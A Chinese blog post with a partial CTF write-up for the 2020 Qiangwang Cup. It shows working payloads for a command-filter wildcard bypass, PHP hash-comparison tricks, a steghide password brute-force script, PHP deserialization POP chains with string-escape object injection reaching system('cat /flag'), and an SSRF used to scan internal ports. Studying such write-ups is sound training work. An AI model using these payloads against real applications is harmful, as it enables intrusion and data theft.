2020强网杯线上赛部分题解

最新推荐文章于 2022-09-06 11:10:06 发布
最新推荐文章于 2022-09-06 11:10:06 发布
阅读量2k 收藏 7
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/108212341
版权

目录

主动

在这里插入图片描述在这里插入图片描述

命令执行 只是过滤了关键字flag 通配符绕过即可
在这里插入图片描述

Funhash

在这里插入图片描述在这里插入图片描述

Level1用形如0e+纯数字且md4加密后依旧为0e+纯数字的值绕过

hash1=0e399638706240815825137256701449

在这里插入图片描述

这里难点主要是网上找不到符合要求的值,要自己写脚本碰撞
https://www.cnblogs.com/-mo-/p/11582424.html 我是拿md5的改了一下,然后跑了半天没出来,还好队友跑出来了

Level2 Level3用数组就行
Level4 和这篇文章的一样直接用就行https://blog.csdn.net/iczfy585/article/details/106081299

?hash1=0e399638706240815825137256701449&hash2[]=2&hash3[]=3&hash4=ffifdyop

在这里插入图片描述

upload

在这里插入图片描述

附件是个流量包,可以看出上传了一个图片文件
在这里插入图片描述在这里插入图片描述

且提示使用了steghide处理文件

driftnet -f data.pcapng -a -d /root/Desktop

在这里插入图片描述

分离出一张图片
在这里插入图片描述

使用steghide 提取出文件即可 steghide extract -sf 1.jpg -p 123456
在这里插入图片描述

这里的密码直接猜,或者搞个脚本爆破

#bruteStegHide.sh 
#!/bin/bash

for line in `cat $2`;do
    steghide extract -sf $1 -p $line > /dev/null 2>&1
    if [[ $? -eq 0 ]];then
        echo 'password is: '$line
        exit
    fi  
done 

./bruteStegHide.sh test.jpg passwd.txt

还有两题是没做出来的题参考ying师傅的wp过一遍
https://www.gem-love.com/ctf/2576.html

web辅助

在这里插入图片描述

这题就是pop链加上字符逃逸

  • topsolo类下将midsolo类作为方法调用 -> midsolo类触发__invoke() ->
    Gank()函数中stristr($this->name, ‘Yasuo’) 通过name=jungle类->
    jungle类触发__toString() -> KS() -> system(‘cat /flag’)

在这里插入图片描述在这里插入图片描述

stristr()函数
在这里插入图片描述

当时一直没想到stristr($this->name, ‘Yasuo’)这里把name当作字符串查找也可以触发__toString(),看了一圈echo都是写死的,就不知道咋办了
自己测试了一下

<?php
class TestClass
{
    public $foo;

    public function __construct($foo) 
    {
        $this->foo = $foo;
    }

    public function __toString() {
        echo "Yasuo is best!<br/>";
        system("dir");

    }
}


function Gank($class){
        if (stristr($class, 'Yasuo')){
            echo "Are you orphan?\n";
        }
        else{
            echo "Must Be Yasuo!\n";
        }
    }

$class = new TestClass('Hello');
$a = Gank($class);
?>

在这里插入图片描述

<?php
class topsolo{
    protected $name;
    public function __construct($name = 'Riven'){
        $this->name = $name;
    }
}

class midsolo{
    protected $name;
    public function __construct($name){
        $this->name = $name;
    }
}

class jungle{
    protected $name = "";
    public function __construct($name = "Lee Sin"){
        $this->name = $name;
    }
}
$aa=serialize(new topsolo(new midsolo(new jungle)));
echo $aa;
?>

O:7:"topsolo":1:{s:7:"*name";O:7:"midsolo":1:{s:7:"*name";O:6:"jungle":1:{s:7:"*name";s:7:"Lee Sin";}}}

还有一个__wakeup()修改属性个数绕过,不然无法将name设置为我们需要的值
在这里插入图片描述

这里还有一个check函数,过滤了name关键字,通过hex绕过 将name替换为\6E\61\6D\65
在这里插入图片描述

O:7:"topsolo":1:{S:7:"*\6E\61\6D\65";O:7:"midsolo":3:{S:7:"*\6E\61\6D\65";O:6:"jungle":1:{S:7:"*\6E\61\6D\65";s:7:"Lee Sin";}}}

再就是有个字符逃逸 一组\0*\0能吞掉2个字符 ";s:7:“0*0pass;s:155:” 要这段吞掉 22位
PHP字符逃逸导致的对象注入详解:
和DASCTF 四月赛的差不多https://blog.csdn.net/weixin_43610673/article/details/105754341

?username=test\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0&password=;s:4:"test";O:7:"topsolo":1:{S:7:"*\6E\61\6D\65";O:7:"midsolo":3:{S:7:"*\6E\61\6D\65";O:6:"jungle":1:{S:7:"*\6E\61\6D\65";s:7:"Lee Sin";}}}s:1:"a";s:1"a

最后进行urlencode

?username=test%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0%5C0%2A%5C0&password=%3Bs%3A4%3A%22test%22%3BO%3A7%3A%22topsolo%22%3A1%3A%7BS%3A7%3A%22%00%2A%00%5C6E%5C61%5C6D%5C65%22%3BO%3A7%3A%22midsolo%22%3A3%3A%7BS%3A7%3A%22%00%2A%00%5C6E%5C61%5C6D%5C65%22%3BO%3A6%3A%22jungle%22%3A1%3A%7BS%3A7%3A%22%00%2A%00%5C6E%5C61%5C6D%5C65%22%3Bs%3A7%3A%22Lee+Sin%22%3B%7D%7D%7Ds%3A1%3A%22a%22%3Bs%3A1%22a

在这里插入图片描述

half_infiltration

在这里插入图片描述

<?php
highlight_file(__FILE__);

$flag=file_get_contents('ssrf.php');

class Pass
{


    function read()
    {
        ob_start();
        global $result;
        print $result;

    }
}

class User
{
    public $age,$sex,$num;

    function __destruct()
    {
        $student = $this->age;
        $boy = $this->sex;
        $a = $this->num;
    $student->$boy();
    if(!(is_string($a)) ||!(is_string($boy)) || !(is_object($student)))
    {
        ob_end_clean();
        exit();
    }
    global $$a;
    $result=$GLOBALS['flag'];
        ob_end_clean();
    }
}

if (isset($_GET['x'])) {
    unserialize($_GET['x'])->get_it();
}

在这里插入图片描述
在这里插入图片描述

但这里有个缓冲区,不然没有输出,构造一个fatal error (比赛的时候就是卡在这个地方)

<?php
class Pass{
}
class User{
    public $age,$sex,$num;
}
$q = new User;
$q->age = new Pass;
$q->sex = 'read';
$q->num = 'result';

$c = new User;
$c->age = new Pass;
$c->sex = 'read';
$c->num = this;

$ser = serialize([$q,$c]);
var_dump($ser);
?>

?x=a:2:{i:0;O:4:"User":3:{s:3:"age";O:4:"Pass":0:{}s:3:"sex";s:4:"read";s:3:"num";s:6:"result";}i:1;O:4:"User":3:{s:3:"age";O:4:"Pass":0:{}s:3:"sex";s:4:"read";s:3:"num";s:4:"this";}}

在这里插入图片描述

<?php 
//经过扫描确认35000以下端口以及50000以上端口不存在任何内网服务,请继续渗透内网
    $url = $_GET['we_have_done_ssrf_here_could_you_help_to_continue_it'] ?? false; 
	if(preg_match("/flag|var|apache|conf|proc|log/i" ,$url)){
		die("");
	}

	if($url)
    { 

            $ch = curl_init(); 
            curl_setopt($ch, CURLOPT_URL, $url); 
            curl_setopt($ch, CURLOPT_HEADER, 1);
            curl_exec($ch);
            curl_close($ch); 

     } 

?>

通过爆破可以得到,40000端口有一个上传功能

/ssrf.php?we_have_done_ssrf_here_could_you_help_to_continue_it=http://127.0.0.1:40000

在这里插入图片描述

再下面我没试出来,可能是比赛结束了的原因

在这里插入图片描述在这里插入图片描述

Arnoldqqq
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2020年ccpc题解群友分享的故免费下载
09-21
提取码:8390 复制这段内容后打开百度盘手机App,操作更方便哦 群内某大佬分享的,免费下载,如果失效了可以私信我 群内某大佬分享的,免费下载,如果失效了可以私信我 群内某大佬分享的,免费下载,如果失效了...
2020武大校题解1
08-03
在2020年的武汉大学校中,参者们面临了一场激烈的编程对决。本次比收到了3656份代码提交,共有303名选手参与了比,其中279名选手至少解决了一道题目。这次比的题型多样,涵盖了许多计算机科学和技术的...
2018第二届线ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大必刷题
2020 第四届线Web_Writeup
末初的CSDN博客
08-27 2673
题类型先锋主动uploadFunhashweb辅助WebMisc 先锋 主动 首先题目长这样, 很明显是考查命令执行绕过过滤字符 <?php highlight_file("index.php"); if(preg_match("/flag/i", $_GET["ip"])) { die("no flag"); } system("ping -c 3 $_GET[ip]"); ?> 执行多条命令可以使用;分号或者|管道符闭合上一条命令 绕过方法很多,自己上找,这
线一道套娃MISC题解
flying_bird2019的博客
03-30 739
misc Miscstudy 该题共有七关,将所有flag拼接为最后的结果 第一关 按时间顺序分析流量包,第一个为http包,以get方法请求了一个链接:http://39.99.247.28/fonts/1 访问,在所有字符的最后得到第一个flag 第二关 ...
杯2022 pwn 题解析——yakacmp
CoLin的pwn小屋
08-07 1011
杯2022 pwn 题解析——yakacmp
杯2021 ctf线ezmath wp(#超详细,带逆向新手走过一个又一个小坑)
漫小牛的博客
06-21 3530
文章目录引言第一步、分析文件类型1.可执行文件判断 引言 这是杯2021中的一道Reverse题,将附件进行下载,名称为ezmath,名称为chall,说明这道题跟数学有关,都说ctf比三大谎言:ez、eazy和baby,名称简单,实则并不简单。做出这道题,需要的数学知识远远大于逆向知识。 题目附件: 链接:https://pan.baidu.com/s/13TheaHB7XcbGnBp-M1N5Rg 提取码:k4pm 第一步、分析文件类型 1.可执行文件判断 使用Exeinfo PE查看文件的类型,
2020CCPC题解.pdf
07-12
2020CCPC题解
含有历年来天梯部分题解
最新发布
03-05
每题上方为题目序号,代码为题解部分题解有另法
2020武大校题解1
08-03
2020武汉大学程序设计大题解 本资源为2020武汉大学程序设计大题解,总共包含五道题目:A、B、C、D、E,分别为E. E Yu is a Brutal Creature、B. Best Match、C、D、E。下面是每道题目的详细解释: E...
杯2022 pwn 题解析——yakagame
CoLin的pwn小屋
07-31 3249
杯2022-pwn yakagame write-up
第六届“杯”全国络安全挑战-青少年专项
热门推荐
Moxin1044的博客
09-06 1万+
试卷说明:本次考试共设置30道考题,单选题3分/道,多选题4分/道,满分100分。16、若两台主机在同一子中,则两台主机的IP地址分别与它们的子掩码相“与”的结果一定是?10、若两台主机在同一子中,则两台主机的IP地址分别与它们的子掩码相“与”的结果一定是?14、如果数据包是给本广播的,那么该数据包的目的IP地址应该是()。13、如果数据包是给本广播的,那么该数据包的目的IP地址应该是()。11、如果数据包是给本广播的,那么该数据包的目的IP地址应该是()。
CTF-RSA-WP-2017第二届广东省线
网安小白
03-25 430
CTF-RSA-简单题
杯2020部分WP
Sea_Sand息禅
08-24 2663
Funhash 有三个level,一个一个过 level1: hash函数之后的值等于原值,也就是使用hash进行md4加密之后的密文=明文,比较常见的有0e碰撞相等 给出两个加密之后开头仍是0e的字符串:0e251288019、0e001233333333333334557778889 hash1=0e001233333333333334557778889绕过level1 level2 数组绕过:hash2[]=1&hash3[]=3 level3 特殊字符绕过:hash4=ffifdyop
2021年山东省题库题目抓包
qq_57147160的博客
07-02 708
络安全抓包
CTF解题-2020年杯参WriteUp
道阻且长,行则将至。
08-29 8810
前言 2020年8月22日9:00 - 8月23日21:00,参加(划水)了历时36小时的第四届“杯”全国络安全竞线。 第一次参加CTF比,不可思议(成功傍大佬)地从1800+支队伍中以前10%的排名获得“优胜奖”(成功参与奖),故骄傲(厚脸皮)地记录下比wp…… 先锋 主动 1、进入址,给出后台php源码,发现是个代码审计的题: 2、通过参数拼接命令,发现存在任意命令执行漏洞: 3、进一步查看本路径下的文件: 后台但是过滤了flag关键字,无法直接读取,那么就需要想办法绕过
2020 第四届线Misc_Writeup
末初的CSDN博客
11-07 2498
目录upload签到问卷调查miscstudy upload 下载附件,打开是流量包文件,wireshark打开 查看http的包,追踪一下 很明显是POST上传的图片 File->Export Object->HTTP...将文件Save all保存出来,得到如下: %5c有提示steghide隐藏 steghide.php用notepad++打开 去掉前面这四行,保存修改后缀为jpg或者png都行,得到如下图: 然后把照片丢进kali使用steghide工具提取隐藏信息 有
2017第二届广东省线 phone number
feng的博客
10-01 304
前言 这题因为找不到其他可以利用的点,所以基本上就是SQL注入。但是注入的姿势真的自己没有想到过。既然这题遇到了,以后SQL注入的时候也就多了一种思路。 WP 这题直接讲解法叭。主要就是注册的那个界面的phone,如果你输入了非数字的话,他会提示你只能输入数字。但是这里用16进制是可以的。而且这里是数值型注入,因此直接构造注入语句,然后变成十六进制,然后登录然后进行check。check那个会执行你注入的语句,相当于二次注入了。 因此接下来就是正常的SQL注入了。具体的注入我这里就不说了,我来说一下我遇
杯2019线-misc
wyj_1216 House
05-29 1293
Misc: 题目名称 | 签到 | 题目即flag ​ 题目名称 | 鲲or鳗orGame | 一开始入了音频隐写的坑~ 费了半天劲,开始琢磨起game的点 分析这个game,发现了/rom/game.gb 于是找到了gba模拟器,发现了金手指的功能。 首先利用gba模拟器打开game ​ 然后,搜索金手指 ​ 注意开始的指定数值为0 点击...
2020武大编程竞题解与分析
"2020武大校题解1" 在这篇关于2020年武汉大学校题解中,我们可以看到一些关键的竞数据和一道具体问题的解析。首先,这次编程竞收到了4122份提交代码,共有422名参选手参与,其中312名选手至少...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值